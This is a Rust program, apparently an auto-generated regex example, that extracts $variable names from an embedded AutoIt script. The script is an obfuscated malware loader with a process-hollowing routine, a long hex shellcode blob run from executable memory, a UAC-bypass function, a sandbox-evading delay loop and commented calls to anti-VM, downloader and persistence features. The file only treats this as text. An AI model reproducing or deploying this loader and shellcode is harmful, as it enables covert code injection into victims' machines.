// include the latest version of the regex crate in your Cargo.toml
extern crate regex;
use regex::Regex;
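/// Prints every AutoIt `$variable` reference found in an embedded script sample.
///
/// The sample is an obfuscated AutoIt script: it allocates memory with
/// `VirtualAlloc` (protection `0x40`) and calls into a hex blob through
/// `DllCallAddress`. This program treats it purely as text and never
/// interprets or runs it. Listing the identifiers is a typical first step
/// when triaging or renaming variables in a script like this.
///
/// # Panics
///
/// Panics only if the hard-coded pattern fails to compile.
fn main() {
    // The `$` must be escaped. Unescaped it is an end-of-line/end-of-text anchor,
    // and an anchor followed by `[a-zA-Z0-9_]+` can never match, so the original
    // pattern `(?m)$[a-zA-Z0-9_]+` produced no output at all. With a literal `\$`
    // there is no anchor left, so the `(?m)` flag is dropped as well.
    let variable_pattern =
        Regex::new(r"\$[a-zA-Z0-9_]+").expect("hard-coded pattern is a valid regex");

    // Match input only. The continuation lines stay at column 0 because any
    // leading whitespace would become part of the string.
    let sample = "Execute(\"Opt(\"\"TrayIconHide\"\", 1)\")
;~ Call(\"CustomAntiVM\")
;~ Call(\"CustomAntiSandbox\")
;~ Call(\"CustomDelay\")
;~ Call(\"CustomStartup\")
;~ Call(\"CustomDownloader\")
;~ Call(\"CustomUACBypass\")
Global $ProcessId
Global $XWNFIUYHFDUH = Execute('%INJECTION%')
Call(\"Hollowing\",$XWNFIUYHFDUH, \"\", GetResources())
;~ Call(\"CustomMeltFile\")
;~ Call(\"CustomPersistence\")
Func Hollowing($wPath, $wArguments, $lpFile)
Local $ojnkoeyrcwxlutoux = \"0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8B\"
Local $kxghsiqvahwxnq = $ojnkoeyrcwxlutoux & \"C885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5D\"
Local $sdqpidmqtyxkecrfsp = $kxghsiqvahwxnq & \"C20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803\"
Local $wtzfkbwb = $sdqpidmqtyxkecrfsp & \"CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F\"
Local $xonwcuofeidefqludikidnevpgau = $wtzfkbwb & \"5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC81ECF003000053565733FF897DB8648B35\"
Local $qntpthgycxwcvzxicnjfif = $xonwcuofeidefqludikidnevpgau & \"300000008B760C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B368B761889\"
Local $bbrnxjj = $qntpthgycxwcvzxicnjfif & \"75C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8C7855CFFFFFF794A8A0B898524FFFFFF\"
Local $shvtuoronlyjnrglhmeqvsbwvl = $bbrnxjj & \"8D45B0898528FFFFFF8D45A489852CFFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538\"
Local $llryfjxokqaibkgtpblwvnuqjat = $shvtuoronlyjnrglhmeqvsbwvl & \"FFFFFF8D45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D4594898548FFFFFF8D45C4\"
Local $tnzfzyidgxogpmyh = $llryfjxokqaibkgtpblwvnuqjat & \"89854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFFEE38830CC78564FFFFFF5764E101C78568FF\"
Local $qlzltjbdzlyqxqbpfpdakkbj = $tnzfzyidgxogpmyh & \"FFFF18E4CA08C7856CFFFFFFE3CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFF\"
Local $shawavvjwgeejpajlvgozrfp = $qlzltjbdzlyqxqbpfpdakkbj & \"E4C7B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427230FC7458CE86F180D\"
Local $wzbzixxgjpsmjfddpp = $shawavvjwgeejpajlvgozrfp & \"898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45B850E842FEFFFF8B8CB520FFFFFF890185C00F84\"
Local $urmwfppupodnjbbkzbuvayjx = $wzbzixxgjpsmjfddpp & \"910300004683FE0E7CD28BDF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000\"
Local $utwnzgscykxocatlkoiicwgrlzg = $urmwfppupodnjbbkzbuvayjx & \"8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB74614897DF8897DBC8945D039\"
Local $bjtoviobltcuiva = $utwnzgscykxocatlkoiicwgrlzg & \"BEA0000000741139BEA40000007409F6461601750333FF4733D2897DF433C08955EC6639110F94C03D4D\"
Local $ozemhyijlmqavynfcazqtevbgoz = $bjtoviobltcuiva & \"5A00000F840E03000033C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100000F\"
Local $hritzmbigny = $ozemhyijlmqavynfcazqtevbgoz & \"84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508FF55A485C00F84AD0200008D85\"
Local $ritzicfhsdx = $hritzmbigny & \"10FCFFFF50FF75DCFF55A085C00F84980200006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF55\"
Local $ozujehkdcgtyardsqotqhsd = $ritzicfhsdx & \"9485C00F84780200008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A406800300000FF7650\"
Local $irxtwsvzvwjd = $ozujehkdcgtyardsqotqhsd & \"6A00FF55988BD885DB0F84450200006A406800300000FF7650FF7634FF75D8FF55C08945F885C0753B85\"
Local $izqhuxcksyjsifkptzmq = $irxtwsvzvwjd & \"FF0F84230200006A406800300000FF765033FFC745EC0100000057FF75D8FF55C08945F885C075146800\"
Local $wvlrhnnkhhxcrnutzgzsehlki = $izqhuxcksyjsifkptzmq & \"8000005753FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B4606732C8B7DD0\"
Local $elrig = $wvlrhnnkhhxcrnutzgzsehlki & \"83C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4DF08D7F280FB7460641894DF03BC87CDC8B\"
Local $fwjshmnzzhkr = $elrig & \"7B3C8B45F803FB837DEC008947340F848A000000837DF4000F84800000008B97A00000008365F40003D3\"
Local $dlbgbukrqnzulokbidbwcbbbsy = $fwjshmnzzhkr & \"83BFA400000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685C0742B25FF0F0000\"
Local $ghfzgrimeajcdqgrpswogsclqwf = $dlbgbukrqnzulokbidbwcbbbsy & \"03028945EC8BC88B46342904198B4DF08B47340FB74C4A0881E1FF0F0000030A0104198B4DF08B420441\"
Local $npcjancoclqgimzkks = $ghfzgrimeajcdqgrpswogsclqwf & \"83E808894DF0D1E83BC872BB8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8\"
Local $galpkljedrneujjluxcqj = $npcjancoclqgimzkks & \"FF75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC85C00F84E4FEFFFF33C0\"
Local $oabegzlochissjwuxeqavj = $galpkljedrneujjluxcqj & \"897DF4663B4606736C8B7DD083C73C03FE8B07A900000020741985C079046A40EB172500000040F7D81B\"
Local $kbxqhwwr = $oabegzlochissjwuxeqavj & \"C083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E803\"
Local $bitjszjlemxpbjembznrx = $kbxqhwwr & \"45F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC8729E33FF68008000005753FF55\"
Local $slpnfpagpsoslgayirw = $bitjszjlemxpbjembznrx & \"C485C00F845BFEFFFF576A048D45F8508B85B4FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46\"
Local $klzedfibwlphj = $slpnfpagpsoslgayirw & \"280345F88985C0FCFFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C00F840D\"
Local $etixewnk = $klzedfibwlphj & \"FEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB050F8677FCFFFF33C05F5E5B8BE5\"
Local $N1 = $etixewnk & \"5DC20C00\"
Local $lpShellcode = DllCall(\"kernel32\", \"ptr\", \"VirtualAlloc\", \"dword\", 0, \"dword\", BinaryLen($N1), \"dword\", 0x3000, \"dword\", 0x40)[0]
Local $File_Struct = DllStructCreate(\"byte lpfile[\" & StringLen($lpFile) & \"]\")
BitAND(DllStructSetData(DllStructCreate(\"byte shellcode[\" & BinaryLen($N1) & \"]\", $lpShellcode), \"shellcode\", $N1),DllStructSetData($File_Struct, \"lpfile\", $lpFile))
$ProcessId = DllCallAddress(\"dword\", $lpShellcode + \"0xBE\", \"wstr\", $wPath, \"wstr\", $wArguments, \"ptr\", DllStructGetPtr($File_Struct))[0]
EndFunc
;~ %OPT%
Func CustomUACBypass()
Local $ejifuhzuieh = Execute(BinaryToString(\"0x497341646d696e2829\"))
Local $QSZUIEHZ = \"WIN_10\"
Local $ONUHBFE = \"WIN_7\"
If Not $ejifuhzuieh Then
Local $QSDJSI = @OSVersion
If $QSDJSI == $QSZUIEHZ Then
CustomWin10Elevation()
ElseIf $QSDJSI == $ONUHBFE Then
CustomWin7Elevation()
EndIf
EndIf
EndFunc
Func CDEL($SLTIME,$SLEOO)
For $i = 0 To $SLEOO
DllCall(\"kernel32.dll\", \"none\", \"Sleep\", \"dword\", $SLTIME/ $SLEOO)
$avar = 999
While $avar == 999
$avar = $avar + 1 * $avar - 1 ^ 405 + $avar * $avar
$avar = 11200
WEnd
Next
EndFunc";

    // `captures_iter` yields one `Captures` value per non-overlapping match, not
    // index tuples. The pattern has no explicit groups, so each value holds only
    // the implicit whole-match group, i.e. the `$name` token.
    for captures in variable_pattern.captures_iter(sample) {
        println!("{:?}", captures);
    }
}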
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Rust, please visit: https://docs.rs/regex/latest/regex/